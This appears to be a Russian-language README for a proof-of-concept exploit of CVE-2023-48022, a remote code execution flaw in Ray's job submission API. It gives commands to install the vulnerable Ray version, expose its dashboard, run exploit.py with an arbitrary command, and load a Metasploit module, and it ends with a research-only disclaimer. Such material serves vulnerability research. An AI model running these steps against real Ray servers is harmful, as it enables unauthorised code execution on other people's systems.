
ShadowRay RCE POC (CVE-2023-48022)
Этот скрипт эксплойта и PoC написаны для углубленного анализа CVE на vsociety.
Фреймворк Ray, важный инструмент для приложений на Python в области ИИ и машинного обучения, столкнулся с серьезной проблемой безопасности. По сути, Ray — это швейцарский нож для людей, работающих над проектами ИИ и больших данных. Обозначенная как CVE-2023-48022, эта уязвимость специфически затрагивает API отправки заданий. Согласно официальному описанию, этот недостаток позволяет удаленному злоумышленнику выполнять произвольный код, что представляет значительный риск для систем, использующих эти версии Ray. Обнаружение этой уязвимости подчеркнуло важность надежных протоколов безопасности в программных фреймворках, особенно в тех, которые являются неотъемлемой частью проектов ИИ и МО с большими объемами данных и вычислительными мощностями.
Сначала установите Ray:
pip3 install -U "ray[default]"==2.8.0
Затем запустите Ray:
ray start --head --dashboard-host=0.0.0.0
Запустите эксплойт на Python:
python3 exploit.py --host http://192.168.150.16:8265 --cmd '<cmd>'
Скопируйте Ruby-файл в соответствующую папку Metasploit:
cp ray_job_rce.rb /usr/share/metasploit-framework/modules/exploits/multi/misc/
Запустите Metasploit с помощью msfconsole и перезагрузите модули командой reload_all, если не можете найти добавленный.
Выберите его с помощью use exploit/multi/misc/ray_job_rce.
Установите необходимые параметры (RHOST, RPORT, COMMAND и т.д.) и запустите эксплойт командой exploit.
Этот скрипт эксплойта был создан исключительно для исследований и разработки эффективных методов защиты. Он не предназначен для использования в каких-либо вредоносных или несанкционированных действиях. Автор и владелец скрипта снимают с себя любую ответственность за неправильное использование или ущерб, причиненный этим программным обеспечением. Имейте в виду, что пользователям настоятельно рекомендуется использовать это программное обеспечение ответственно и только в соответствии с применимыми законами и нормативными актами. Используйте ответственно.